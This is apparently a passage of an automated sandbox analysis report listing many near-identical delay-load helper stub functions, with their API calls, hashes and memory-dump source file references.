                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: b5882c229a56c5fed77c00a2851532509c2e163d0c4807076061baf9fa48798e
                                                                                                    • Instruction ID: babf44dea440c241202a0b640cdb756e9f8eb0ccef0b361f186d5ce58b25838f
                                                                                                    • Opcode Fuzzy Hash: b5882c229a56c5fed77c00a2851532509c2e163d0c4807076061baf9fa48798e
                                                                                                    • Instruction Fuzzy Hash: 17B012F139A100BC310851252C0FCF7014CE4C1B10330743EFC06F02C1D840AC810531
                                                                                                    Function 00E1E282 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 0aee2933a845e7383ec1649fe26b3ed2c4b397fdd2edd96be0e4ba1a0fd720d7
                                                                                                    • Instruction ID: b58b8d8b998c0e657094dfe6ac98dd6813cc4a80b20c5114888fd478ae1d0629
                                                                                                    • Opcode Fuzzy Hash: 0aee2933a845e7383ec1649fe26b3ed2c4b397fdd2edd96be0e4ba1a0fd720d7
                                                                                                    • Instruction Fuzzy Hash: 97B012F139A100BC310851252D0BCF701CCD4C1B10730703EFC06F0280DC40ADC20531
                                                                                                    Function 00E1E264 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: aca74c79e3ce7f7748e789aed70e2dbe941a86ef10f5fe612ce51d4ea1537631
                                                                                                    • Instruction ID: b8728bdc934c8c329472156d62e40e023147af90f704546a48453aece0d2e9d3
                                                                                                    • Opcode Fuzzy Hash: aca74c79e3ce7f7748e789aed70e2dbe941a86ef10f5fe612ce51d4ea1537631
                                                                                                    • Instruction Fuzzy Hash: 89B012F13AB140BC310851252C0BCF7118DE9C1B10730703EFC07F0280D840AC810531
                                                                                                    Function 00E1E26E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 458d61a686628ca78bd78b0dcd67969c85a4b3e259340a17b0eb74310819e2c3
                                                                                                    • Instruction ID: eb509df9d55fa5701b5288cd41ccc8fa5a35cd3de2475c667dd5a62f485052e9
                                                                                                    • Opcode Fuzzy Hash: 458d61a686628ca78bd78b0dcd67969c85a4b3e259340a17b0eb74310819e2c3
                                                                                                    • Instruction Fuzzy Hash: 37B012F139A100BC310851352C0BCF7018CD4C2B10330B03EFC06F0280D840ECC10531
                                                                                                    Function 00E1E246 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 7d2be60384cdb137929e92f92fed5effe63430ad5b1bc18a7c925198b12068ad
                                                                                                    • Instruction ID: 9a9e9411c88fa3ea7de5a64887177116cf10f8ea8143d3f2002901d6700da652
                                                                                                    • Opcode Fuzzy Hash: 7d2be60384cdb137929e92f92fed5effe63430ad5b1bc18a7c925198b12068ad
                                                                                                    • Instruction Fuzzy Hash: BEB012F139B140BC310851252C0BCF7114DD5C2B10730B03EFC06F0280D840EC810531
                                                                                                    Function 00E1E250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 0e71e658cf4f5545970a86bbdf5f7382a9c8f5f08cd1f95045c71aa062bf51d2
                                                                                                    • Instruction ID: fe2729520db740f204bc47b8aa18655630ccb5c199cf1a51c30eac915372df7a
                                                                                                    • Opcode Fuzzy Hash: 0e71e658cf4f5545970a86bbdf5f7382a9c8f5f08cd1f95045c71aa062bf51d2
                                                                                                    • Instruction Fuzzy Hash: F3B012F139B240BD314852252C0BCF7114DD5C1B10730713EFC06F0280D840ACC50531
                                                                                                    Function 00E1E228 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 7c4f774842aa1b57f826ffa536ca04e9abef5484413cb1a0b25dfd292227c235
                                                                                                    • Instruction ID: 178a3d4d80ae92c0b8a85791502920bc69e07f0dc77f12efb59f758e6c418f5c
                                                                                                    • Opcode Fuzzy Hash: 7c4f774842aa1b57f826ffa536ca04e9abef5484413cb1a0b25dfd292227c235
                                                                                                    • Instruction Fuzzy Hash: C5B012F139A200BD314851252C0BCF7014CD4C1F10330713EFC06F0281D840ADC10571
                                                                                                    Function 00E1E232 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 9e243448f2014e017d96d4ab0056628c98d6c69261b16ed6ba0679ad5235411f
                                                                                                    • Instruction ID: 6993a3a4fedcfe7352210d29121f74e4a839574a41f772ebd74f68e315a07bbc
                                                                                                    • Opcode Fuzzy Hash: 9e243448f2014e017d96d4ab0056628c98d6c69261b16ed6ba0679ad5235411f
                                                                                                    • Instruction Fuzzy Hash: 63B012F139A100BC310855252D0BCF7014CD4C1F10330703EFC06F0281DC40AE820531
                                                                                                    Function 00E1E23C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 55c1f9d72fefcece00a2d6c2db55064b3670557a6045d0b57177fef43e6570c2
                                                                                                    • Instruction ID: 45d887969c769a7e063d4f4e551036953b01359ad36dd79ec53a0ff488ea5c6a
                                                                                                    • Opcode Fuzzy Hash: 55c1f9d72fefcece00a2d6c2db55064b3670557a6045d0b57177fef43e6570c2
                                                                                                    • Instruction Fuzzy Hash: 91B012F139A100BC310851262C0BCF7014CE4C1F10330703EFC06F0281D840AD810531
                                                                                                    Function 00E1E200 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 53456d08a4075de6f9cffe44b119696888e9e7e3322e43c08dde33ff21e1a83f
                                                                                                    • Instruction ID: 33258b9870517a0cb993c9f680ddf3acbe670b7106764d0adee44e69236c5e90
                                                                                                    • Opcode Fuzzy Hash: 53456d08a4075de6f9cffe44b119696888e9e7e3322e43c08dde33ff21e1a83f
                                                                                                    • Instruction Fuzzy Hash: FCB012F13AA240BD314852252C0BCF7014CD4C1B20330B23EFC06F0381D840ACC50531
                                                                                                    Function 00E1E20A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E45000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E62000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E63000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000E75000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EA8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1652191364.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e00000_voed9G7p5s.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                    • String ID:
                                                                                                    • API String ID: 1269201914-3618818622
                                                                                                    • Opcode ID: 7391af25d007d445f6bf8d6397cffa745f75a98e3de3150d69998167613a0046
                                                                                                    • Instruction ID: 66c917dc6adc3fda00ce2f04667628cba0de5ce9412f137e5657d085b87ad211
                                                                                                    • Opcode Fuzzy Hash: 7391af25d007d445f6bf8d6397cffa745f75a98e3de3150d69998167613a0046
                                                                                                    • Instruction Fuzzy Hash: 99B012F139A100BC310852252D0BCF7014CD4C1B20330B13EFC06F0381DC50AD8A0531
                                                                                                    Function 00E1E21E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00E1E1E3
                                                                                                      • Part of subcall function 00E1E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00E1E8D0
                                                                                                      • Part of subcall function 00E1E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00E1E8E1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.1651790337.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.1651771284.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651920661.0000000000E33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.1651999290.0000000000E3E000.00000004.00000001.01000000.00000003.sdmpDownload File
